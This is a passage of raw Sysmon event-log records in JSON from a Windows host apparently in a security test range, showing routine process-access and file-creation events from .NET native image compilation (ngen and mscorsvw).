C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.179","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00100B400B00}","TargetProcessId":"4252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6937,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.210\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00107C430B00}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.210","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00107C430B00}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6938,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.210\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00107C430B00}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.210","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00107C430B00}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6939,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.210\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00107C430B00}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.210","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00107C430B00}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6940,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:04.304\r\nProcessGuid: {41C8662E-2230-5F25-0000-00107C430B00}\r\nProcessId: 2872\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b38-0\\Microsoft.GroupPolicy.Targeting.Interop.dll\r\nCreationUtcTime: 2020-08-01 08:05:04.304","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:04.304","ProcessGuid":"{41C8662E-2230-5F25-0000-00107C430B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b38-0\\Microsoft.GroupPolicy.Targeting.Interop.dll","CreationUtcTime":"2020-08-01 08:05:04.304","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6941,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.320\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00102C470B00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.320","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00102C470B00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6942,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.320\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00102C470B00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.320","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00102C470B00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6943,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.320\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00102C470B00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.320","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00102C470B00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6944,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.367\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010C84A0B00}\r\nTargetProcessId: 2408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.367","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010C84A0B00}","TargetProcessId":"2408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
